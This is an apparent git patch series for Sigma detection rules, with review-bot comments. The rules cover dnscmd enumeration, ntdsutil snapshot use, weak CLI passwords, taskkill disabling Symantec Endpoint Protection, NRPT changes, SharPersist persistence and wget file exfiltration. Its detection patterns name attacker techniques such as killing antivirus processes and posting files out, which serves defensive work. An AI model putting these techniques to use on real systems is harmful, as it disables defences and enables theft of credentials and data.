100644 --- a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml 
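Review bot: `PranetImage|endswith: '\dllhost.exe'` is a typo for `ParentImage`; no log source or field mapping has a `PranetImage` field, so the selection can never match and the rule stops firing entirely. Correct it to `ParentImage|endswith: '\dllhost.exe'`. The commit message only mentions the missing `|contains` on `ParentCommandLine`, which is the right fix for those two CLSID strings, but the switch from `Image` to the parent field is a semantic change (the child spawned by the elevated `dllhost.exe` COM surrogate rather than the surrogate itself) and should be confirmed as intended; the `filter:` that follows lies outside this hunk.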
@@ -1,23 +1,24 @@ title: Discovery/Execution via dnscmd.exe id: b6457d63-d2a2-4e29-859d-4e7affc153d1 -description: | +description: | Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service. Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain references: - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records - - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd + - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records + - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ status: experimental author: '@gott_cyber' date: 2022/07/31 +modified: 2022/09/14 tags: - - attack.discovery - - attack.execution - - attack.t1543.003 + - attack.discovery + - attack.execution + - attack.t1543.003 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: dnscmd: Image|endswith: '\dnscmd.exe' @@ -25,6 +26,7 @@ detection: CommandLine|contains: - '/enumrecords' - '/enumzones' + - '/ZonePrint' - '/info' selection_2: CommandLine|contains|all: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml similarity index 57% rename from rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml rename to rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml index ff90db27b..312a8ba58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml +++ b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml 
@@ -4,19 +4,19 @@ status: test description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) author: Thomas Patzke references: - - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm date: 2019/01/16 modified: 2022/03/11 # increased level logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ntdsutil.exe' - condition: selection + selection: + Image|endswith: '\ntdsutil.exe' + condition: selection falsepositives: - - NTDS maintenance + - NTDS maintenance level: medium tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml index 780851390..e6c83822a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml 
@@ -4,22 +4,21 @@ status: test description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups. author: 'Furkan Caliskan (@caliskanfurkan_)' references: - - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - - https://github.com/yosqueoy/ditsnap + - https://thedfirreport.com/2020/06/21/snatch-ransomware/ + - https://github.com/yosqueoy/ditsnap date: 2020/07/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ditsnap.exe' - selection2: - CommandLine|contains: 'ditsnap.exe' - condition: selection or selection2 + selection: + - Image|endswith: '\ditsnap.exe' + - CommandLine|contains: 'ditsnap.exe' + condition: selection falsepositives: - - Legitimate admin usage + - Legitimate admin usage level: high tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml new file mode 100644 index 000000000..cff53a918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml 
@@ -0,0 +1,38 @@ +title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +id: a58353df-af43-4753-bad0-cd83ef35eef5 +related: + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived +status: experimental +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +author: Nasreddine Bencherchali +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +date: 2022/09/14 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: '\ntdsutil.exe' + - OriginalFileName: 'ntdsutil.exe' + selection_cli: + - CommandLine|contains|all: + - 'snapshot' + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - 'ac' + - ' i' + - ' ntds' + condition: all of selection_* +falsepositives: + - Legitimate usage to restore snapshots + - Legitimate admin activity +level: medium +tags: + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml new file mode 100644 index 000000000..0afe7b43e --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml 
@@ -0,0 +1,26 @@ +title: Weak or Abused Passwords In CLI +id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 +status: experimental +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +author: Nasreddine Bencherchali +date: 2022/09/14 +tags: + - attack.defense_evasion + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + # Add more passwords + - 'Asd123.aaaa' + - 'password123' + - '123456789' + condition: selection +falsepositives: + - Legitimate usage of the passwords by users via commandline (should be discouraged) + - Other currently unknown false positives +level: medium From 02cfd972edf108f8527c50e8b9eabee51250e624 Mon Sep 17 00:00:00 2001 From: krestinichev <100998565+krestinichev@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:37:51 +0300 Subject: [PATCH 021/120] Add files via upload --- .../proc_creation_disable_SEP.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_disable_SEP.yml diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml new file mode 100644 index 000000000..102423988 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml 
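Review bot: `'123456789'` as a bare substring of `CommandLine` matches any command line carrying a long numeric token (ticket IDs, timestamps, hashes, GUIDs), and `'password123'` matches any longer string that contains it, so at `level: medium` this will be noisy across a fleet. Tie the list to the scenario given in the description, e.g. add `selection_cli: CommandLine|contains: ' user '` (net/net1 account creation) and use `condition: all of selection*`, or at least drop the purely numeric entry. The `tags` list carries tactics only; the described scenario (creating a user with an inline password) maps to a technique such as `attack.t1136.001`, which would make the rule more useful in ATT&CK-driven dashboards.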
@@ -0,0 +1,25 @@ +title: Disabling SEP +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - internal investigation +author: Ilya Krestinichev +date: 2022/09/13 +tags: + - attack.Impair_Defenses + - attack.t1562 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentCommandLine|contains|all: + - 'taskkill' + - 'ccSvcHst.exe' + condition: selection +fields: + - CommandLine +falsepositives: + - Unknown +level: critical \ No newline at end of file From eb4247fdb45bfd2a90e2768e23a9f8473d81242b Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:03:50 +0200 Subject: [PATCH 022/120] Add missing modified field --- .../proc_creation_win_cmd_redirection_susp_folder.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index dada69bd7..14fc79e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ date: 2022/07/12 +modified: 2022/09/14 logsource: category: process_creation product: windows From d078d47360c00849778d834ce0f491c836632be5 Mon Sep 17 00:00:00 2001 
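Review bot: `id: 4a6713f6-3331-11ed-a261-0242ac120002` is a time-based (version 1) UUID — the `1` leading the third group marks the version — whereas every other rule id on this page is a random version-4 UUID (third group starting with `4`, e.g. `26488ad0-f9fd-4536-...`); regenerate it as a v4 UUID before merge so the file follows the repository convention and does not embed a host timestamp and node id. The detection, tags, references and level of this file are reworked by later patches in this series, so I am not repeating those points here.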
From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 22:32:35 +0430 Subject: [PATCH 023/120] New Rule: Windows DNS Client Rule --- .../posh_ps_add_dnsclient_rule.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml new file mode 100644 index 000000000..637bf65e2 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -0,0 +1,23 @@ +title: Windows DNS Client Commands +id: 4368354e-1797-463c-bc39-a309effbe8d7 +status: experimental +description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. +references: + - https://twitter.com/NathanMcNulty/status/1569497348841287681 + - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps +author: Borna Talebi +date: 2021/09/14 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + selection: + ScriptBlockText|contains: Add-DnsClientNrptRule + condition: selection +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown +level: high From 227c2f6bb91f872cc25f33b25f5f14f4d353ce36 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:11:52 +0430 Subject: [PATCH 024/120] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) 
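Review bot: `date: 2021/09/14` is a year off: the commit is dated 14 Sep 2022 and the rule is new in this patch, so it should read `date: 2022/09/14` (a wrong creation date skews rule-age reporting downstream). `ScriptBlockText|contains: Add-DnsClientNrptRule` is an unquoted plain scalar; it parses correctly here, but the other rules on this page quote their string values, so `ScriptBlockText|contains: 'Add-DnsClientNrptRule'` keeps it consistent and protects against a later edit adding a YAML-significant character. The tag pair `attack.impact` / `attack.t1565` (Data Manipulation) seems a loose fit for a rule about redirecting name resolution via NRPT; the tactic choice is worth revisiting against ATT&CK, and I would hedge it rather than assert a specific replacement here.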
diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 637bf65e2..5d589174b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -13,7 +13,10 @@ logsource: definition: Script Block Logging must be enabled detection: selection: - ScriptBlockText|contains: Add-DnsClientNrptRule + ScriptBlockText|contains|all: + - Add-DnsClientNrptRule + - Namespace + - NameServers condition: selection tags: - attack.impact From 0e7085bee5388b7b27319c80f152fc51ac404379 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:23:58 +0430 Subject: [PATCH 025/120] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 5d589174b..def0de1c4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -15,8 +15,8 @@ detection: selection: ScriptBlockText|contains|all: - Add-DnsClientNrptRule - - Namespace - - NameServers + - '-Namespace ' + - '-NameServers ' condition: selection tags: - attack.impact From 2fe25f3c80a1ddb23a53800313176406a3bb32be Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 15 Sep 2022 16:50:34 +0200 Subject: [PATCH 026/120] rule: sharpersist usage --- .../proc_creation_win_hack_sharpersist.yml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml 
diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml new file mode 100644 index 000000000..02c36329a --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -0,0 +1,42 @@ +title: SharPersist Usage +id: 26488ad0-f9fd-4536-876f-52fea846a2e4 +status: experimental +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +author: Florian Roth +references: + - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit + - https://github.com/mandiant/SharPersist +date: 2022/09/15 +logsource: + category: process_creation + product: windows +tags: + - attack.persistence + - attack.t1053 + - attack.t1060 + - attack.t1050 +detection: + selection1: + Image|endswith: '\SharPersist.exe' + selection2: + Product: 'SharPersist' + selection3: + CommandLine|contains: + - ' -t schtask -c ' + - ' -t startupfolder -c ' + selection4: + CommandLine|contains|all: + - ' -t reg -c ' + - ' -m add' + selection5: + CommandLine|contains|all: + - ' -t service -c ' + - ' -m add' + selection6: + CommandLine|contains|all: + - ' -t schtask -c ' + - ' -m add' + condition: selection +falsepositives: + - Unknown +level: high From b984d52c65189443a40afcead88097c4e41c1438 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:32:47 +0430 Subject: [PATCH 027/120] Fixing conditions --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index def0de1c4..1c8d0ab78 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml 
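Review bot: `condition: selection` references an identifier that does not exist — the selections are named `selection1` through `selection6` — so the rule fails validation or, on a lenient backend, never matches; it should be `condition: 1 of selection*`. `attack.t1060` and `attack.t1050` are revoked ATT&CK IDs (Registry Run Keys and New Service were folded into `attack.t1547.001` and `attack.t1543.003`), so the tags should be updated, and `attack.privilege_escalation` considered alongside `attack.persistence`. `selection3` matches `' -t schtask -c '` / `' -t startupfolder -c '` without requiring `-m add`, so it overlaps `selection6` and presumably also fires on the tool's non-add modes; if that is intended it deserves a comment, otherwise fold those two strings into the `-m add` patterns.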
+++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -14,9 +14,9 @@ logsource: detection: selection: ScriptBlockText|contains|all: - - Add-DnsClientNrptRule - - '-Namespace ' - - '-NameServers ' + - 'Add-DnsClientNrptRule' + - '-Namesp' + - '-NameSe' condition: selection tags: - attack.impact From 2af0431efafb04f19e8c9fb1bbeb1128b5c9a81d Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:53:55 +0430 Subject: [PATCH 028/120] Change Title --- .../powershell/powershell_script/posh_ps_add_dnsclient_rule.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 1c8d0ab78..6acd74a7f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -1,4 +1,4 @@ -title: Windows DNS Client Commands +title: Powershell Add Name Resolution Policy Table Rule id: 4368354e-1797-463c-bc39-a309effbe8d7 status: experimental description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. From 92b6ba95e62d2d5514b39be94cdd60e9ef0861fd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:12:08 +0200 Subject: [PATCH 029/120] reduce the timeframe to 1min --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index ab736de4d..fd5cdf40b 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml 
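Review bot: `'-Namesp'` and `'-NameSe'` are truncated on purpose — PowerShell accepts any unambiguous parameter prefix, and `-Names` would be ambiguous between `-Namespace` and `-NameServers` — but nothing in the rule says so, and the next reader will take them for typos; add a comment above the list, e.g. `# Shortest unambiguous prefixes of -Namespace and -NameServers (PowerShell resolves abbreviated parameter names)`. If the cmdlet also accepts these parameters positionally, the `|all` requirement on the prefixes would miss that form, which is worth checking in the referenced cmdlet documentation and, if so, noting under `falsepositives` or in the description as a coverage limit. Quoting `'Add-DnsClientNrptRule'` is a good consistency fix.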
+++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,7 +16,7 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - timeframe: 10m + timeframe: 1m condition: selection | count() > 10 fields: - ShareName From 6d9d08e1dec7bb6e86cdcfde55fbb23822881616 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:18:27 +0200 Subject: [PATCH 030/120] Update proc_creation_disable_SEP.yml --- .../proc_creation_disable_SEP.yml | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 102423988..773527fc0 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml 
@@ -1,25 +1,27 @@ -title: Disabling SEP +title: Disabling Symantec Endpoint Protection with Taskkill id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental -description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - - internal investigation -author: Ilya Krestinichev + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth date: 2022/09/13 tags: - - attack.Impair_Defenses - - attack.t1562 + - attack.defense_evasion + - attack.t1562.001 logsource: category: process_creation product: windows detection: selection: - ParentCommandLine|contains|all: + CommandLine|contains|all: - 'taskkill' + - ' /F ' + - ' /IM ' - 'ccSvcHst.exe' condition: selection -fields: - - CommandLine falsepositives: - Unknown -level: critical \ No newline at end of file +level: high From b4376ea580c7bdf74ac864b21a97b7e49d6a9162 Mon Sep 17 00:00:00 2001 
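Review bot: `' /F '` and `' /IM '` carry trailing spaces, so the very example the description gives (`/f` as the last token of the command line) is not matched because nothing follows the final `/f`; drop the trailing spaces, `- ' /F'` and `- ' /IM'`, so both argument positions are covered — Sigma string matching is case-insensitive by default, so `/im` versus `/IM` is not a concern. The rewritten description still has its word order garbled (`can execute the taskkill /im command several times ccSvcHst.exe /f`); it should read `can run taskkill /F /IM ccSvcHst.exe repeatedly, killing the service process and thus shutting down the service`. `'taskkill'` plus `'ccSvcHst.exe'` remain the anchoring pair, so shortening the flag tokens does not widen the false-positive surface.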
From: Florian Roth Date: Fri, 16 Sep 2022 09:22:21 +0200 Subject: [PATCH 031/120] refactor: CRLF to LF --- .../proc_creation_disable_SEP.yml | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 773527fc0..abe183491 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml 
@@ -1,27 +1,27 @@ -title: Disabling Symantec Endpoint Protection with Taskkill -id: 4a6713f6-3331-11ed-a261-0242ac120002 -status: experimental -description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. -references: - - https://www.exploit-db.com/exploits/37525 - - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection - - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer -author: Ilya Krestinichev, Florian Roth -date: 2022/09/13 -tags: - - attack.defense_evasion - - attack.t1562.001 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - 'taskkill' - - ' /F ' - - ' /IM ' - - 'ccSvcHst.exe' - condition: selection -falsepositives: - - Unknown -level: high +title: Disabling Symantec Endpoint Protection with Taskkill +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. 
+references: + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth +date: 2022/09/13 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'taskkill' + - ' /F ' + - ' /IM ' + - 'ccSvcHst.exe' + condition: selection +falsepositives: + - Unknown +level: high From 4fc62dee7c37bf97bb20db6b03e4109e85d1591d Mon Sep 17 00:00:00 2001 
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:22:57 +0200 Subject: [PATCH 032/120] Linux rules update --- .../auditd/lnx_auditd_data_exfil_wget.yml | 28 +++---- .../lnx_auditd_susp_histfile_operations.yml | 44 +++++----- .../linux/builtin/lnx_shell_susp_commands.yml | 84 +++++++++---------- ..._connection_lnx_back_connect_shell_dev.yml | 23 +++-- .../proc_creation_lnx_at_command.yml | 4 +- .../proc_creation_lnx_base64_decode.yml | 20 ++--- .../proc_creation_lnx_base64_shebang_cli.yml | 27 ++++++ ...ation_lnx_bpftrace_unsafe_option_usage.yml | 22 ++--- .../proc_creation_lnx_cat_sudoers.yml | 27 +++--- .../proc_creation_lnx_clear_logs.yml | 3 +- .../proc_creation_lnx_clear_syslog.yml | 6 +- ...proc_creation_lnx_clipboard_collection.yml | 16 ++-- .../proc_creation_lnx_crontab_removal.yml | 21 +++++ .../proc_creation_lnx_crypto_mining.yml | 54 ++++++------ .../proc_creation_lnx_curl_usage.yml | 22 +++++ .../proc_creation_lnx_doas_execution.yml | 2 +- .../proc_creation_lnx_file_deletion.yml | 4 +- .../proc_creation_lnx_local_account.yml | 8 +- .../proc_creation_lnx_local_groups.yml | 7 +- .../proc_creation_lnx_nohup.yml | 18 ++-- .../proc_creation_lnx_python_pty_spawn.yml | 2 +- ...eation_lnx_security_software_discovery.yml | 9 +- ..._creation_lnx_security_tools_disabling.yml | 48 +++++------ ...creation_lnx_services_stop_and_disable.yml | 26 ++++++ ...proc_creation_lnx_susp_curl_fileupload.yml | 38 +++++++++ .../proc_creation_lnx_susp_curl_useragent.yml | 28 +++++++ .../proc_creation_lnx_susp_history_delete.yml | 35 ++++---- .../proc_creation_lnx_susp_history_recon.yml | 36 ++++---- ...roc_creation_lnx_susp_interactive_bash.yml | 31 ++++--- .../proc_creation_lnx_susp_pipe_shell.yml | 23 +++-- ..._creation_lnx_system_network_discovery.yml | 11 ++- ...lnx_triple_cross_rootkit_execve_hijack.yml | 21 +++-- ...ation_lnx_triple_cross_rootkit_install.yml | 30 +++---- 
..._creation_lnx_chattr_immutable_removal.yml | 25 ++++++ 34 files changed, 507 insertions(+), 296 deletions(-) create mode 100644 rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_curl_usage.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml create mode 100644 rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml diff --git a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 70a8dec73..c49ea64da 100644 --- a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -5,21 +5,21 @@ author: 'Pawel Mazur' status: experimental date: 2021/11/18 references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection tags: - - attack.exfiltration - - attack.t1048.003 + - attack.exfiltration + - attack.t1048.003 falsepositives: - - Legitimate usage of wget utility to post a file -level: medium \ No newline at end of file + - Legitimate usage of wget utility to post a file +level: medium 
